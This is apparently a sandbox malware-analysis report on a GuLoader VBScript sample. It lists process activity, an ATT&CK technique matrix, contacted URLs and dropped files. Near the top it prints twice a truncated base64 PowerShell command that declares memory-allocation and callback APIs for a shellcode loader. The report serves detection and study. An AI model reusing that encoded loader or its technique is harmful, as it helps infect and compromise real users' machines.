    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAcJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAaQBjAGsAIABMAGkAbABsAGkAdABoACAAUABvAHMAdAA4ACAAVABhAGMAdABpAGwAZQBzAGkAIABSAEEARABJAEMAVQAgAFAAYQByAHIAYQBmAG8AdQByAGEAIABTAGUAcgB2AGIAagBlAHIANAAgAEIAdQB0AHQAdwBvADgAIABnAGgAZQBuAHQAIABPAE0AUwBLACAAUwBvAG4AZwBpAHMAaABtAGkAMwAgAEMAVQBQAFAARQBSAFMARABFAFgAIABTAHIAZwBlADkAIABJAG4AZwBuAHUAMQAgAEsAYQBuAGQAZQBsAGEAYgByADMAIABTAGEAcgBvAG4AaQBjACAATQBJAEsARQBZAE4ATwBUAEgAIABOAEkAVABSAEUAUgBJAE4AIABUAEEAQwBLACAAUABJAEcAUABFAE4AQgAgAEIAZQB0AGEAcABhAHIAdAA1ACAAZwBlAG4AaQBvAGgAIABVAGcAZQBzAGsAcgBpAGYAIABCAGUAcwBsAGEAZwBzAG0ANwAgAE4AbwBuAHAAcwB5AGMAaAA5ACAAcwBlAG4AcwBpAHQAaQB6ACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGwAdQBkAHIAZQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABWAEUAUgBTAEEATABFAFIATgAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBsAHUAZAByAGUAYwBoACwAaQBuAHQAIABSAGUAZgByAG0AYQBuACwAaQBuAHQAIABTAGwAdQBkAHIAZQBjAGgANwApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUARgBpAGwAZQBBACgAcwB0AHIAaQBuAGcAIABNAG8AbgBzAHQAcgAsAHUAaQBuAHQAIABNAGUAbABsAGUAOAAsAGkAbgB0ACAATgBvAG4AcABlAHIAYwBlAHAALABpAG4AdAAgAFMAbAB1AGQAcgBlAGMAaAAwACwAaQBuAHQAIABIAEEAQgBBAE4ALABpAG4AdAAgAEIAQQBBAE4ALABpAG4AdAAgAE4AUgBJAE4ARwBTACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMAAsAHUAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADEALABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4AMgAsAHIAZQBmACAASQBuAHQAMwAyACAARgBvAHIAYgBpAHMAdAByAGkAbgAzACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAbwByAGIAaQBzAHQAcgBpAG4ANQAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA2ACwAaQBuAHQAIABGAG8AcgBiAGkAcwB0AHIAaQBuADcALABpAG4AdAAgAEYAbwByAGIAaQBzAHQAcgBpAG4AOAAsAGkAbgB0ACAARgBvAHIAYgBpAHMAdAByAGkAbgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAGMAaQBzAHQAZQByAGMAaQAgAHAAdQBuAGsAdABlAHIAIABUAGUAbQB1ADQAIABQAEEAVABSAE8ATgBFAFMAIABIAGUAcwB0AGUAawAgAFUATgBSAEUARgBPACAAYgBlAGsAcgBhAG4AcwAgAFAAYQBtAHAAcgAgAEcAZQBuAGIAcgB1ACAAZABlAGMAZQByACAAQwByAGUAcwBjAGUAbgB0ACAAVABoAGkAYQBzAHUAcwBpACAAcJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ridmj1ad\ridmj1ad.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7F9.tmp" "c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter    		Path Interception11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Query Registry    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts421
    Scripting    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Security Software Discovery    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Application Layer Protocol    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell    		Logon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager1
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information    		NTDS21
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script421
    Scripting    		LSA Secrets1
    Application Window Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information    		Cached Domain Credentials1
    File and Directory Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync12
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 562140 Sample: IMG 0045434.vbs Startdate: 28/01/2022 Architecture: WINDOWS Score: 88 22 Found malware configuration 2->22 24 Yara detected GuLoader 2->24 26 Potential malicious VBS script found (suspicious strings) 2->26 28 2 other signatures 2->28 8 wscript.exe 2 2->8         started        process3 signatures4 30 VBScript performs obfuscated calls to suspicious functions 8->30 32 Wscript starts Powershell (via cmd or directly) 8->32 34 Very long command line found 8->34 36 Encrypted powershell cmdline option found 8->36 11 powershell.exe 25 8->11         started        process5 process6 13 csc.exe 3 11->13         started        16 conhost.exe 11->16         started        file7 20 C:\Users\user\AppData\Local\...\ridmj1ad.dll, PE32 13->20 dropped 18 cvtres.exe 1 13->18         started        process8

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    IMG 0045434.vbs2%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://onedrive.live.com/download?cidOfalse
      		high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1180399057.0000000004FB1000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1180651928.00000000050F7000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/powershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/Licensepowershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://contoso.com/Iconpowershell.exe, 00000003.00000002.1184479242.0000000006014000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:562140
                Start date:28.01.2022
                Start time:14:49:30
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 9m 31s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:IMG 0045434.vbs
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:17
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal88.troj.evad.winVBS@8/11@0/0
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 11
                • Number of non-executed functions: 2
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .vbs
                • Override analysis time to 240s for JS files taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                14:51:47API Interceptor62x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):8003
                Entropy (8bit):4.842774286652891
                Encrypted:false
                SSDEEP:192:Jxoe5FVsm5emdgdVFn3eGOVpN6K3bkkjo5igkjDt4iWN3yBGHc9smgdcU6CupO0P:1EdVoGIpN6KQkj2Zkjh4iUxepib4J
                MD5:62F0B7274EE33977F05FE8727590EBA4
                SHA1:3D7D56215FAF3C0F11BBF6A16ABB09DF83E96BA7
                SHA-256:A59280899B286228ABA87CAC2EED2C3FEA4966BF427899B9B9AEF46AD0FD3E00
                SHA-512:001B11A26D8AF5D8FEE3B259D5E10EAA22801662C539BA70B7EBA0A330C9DD1B4F0CFB3B05B0B63CDA103B771506CF7A35A581DF7986E872A187E2E280D5493C
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                C:\Users\user\AppData\Local\Temp\RES7F9.tmp

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                Category:dropped
                Size (bytes):1328
                Entropy (8bit):3.980586000283681
                Encrypted:false
                SSDEEP:24:HWne9E2+f0vxkmfHLhKEbsmfWI+ycuZhNuHakS/QPNnq9qd:OC1KPm+1ul8a3Aq9K
                MD5:2D4DEC5C4723CFB91B42D0878129B2B1
                SHA1:F2CE468A7D955440C7372ADFC30A881984FCC7C7
                SHA-256:1D72247C3E3DABEA2E821EAD878301EEF76AD2CDBEA456D45E6FC6B5432D2647
                SHA-512:CD266BF5354D2B4CC8AF232A5EC272CCE7EE88F9CA66829887385FB54B61C2F06AD05C62A5293F3DA2726F890AA42E5849361C25288350779E21F22D6097A4A7
                Malicious:false
                Reputation:low
                Preview:L......a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\ridmj1ad\CSC3DE241659FC44F82A3F695B8E7FD432F.TMP..................'.....N..#..........3.......C:\Users\user\AppData\Local\Temp\RES7F9.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.i.d.m.j.1.a.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                C:\Users\user\AppData\Local\Temp\TRICA.dat

                Download File
                Process:C:\Windows\System32\wscript.exe
                File Type:data
                Category:dropped
                Size (bytes):54731
                Entropy (8bit):6.808354912776216
                Encrypted:false
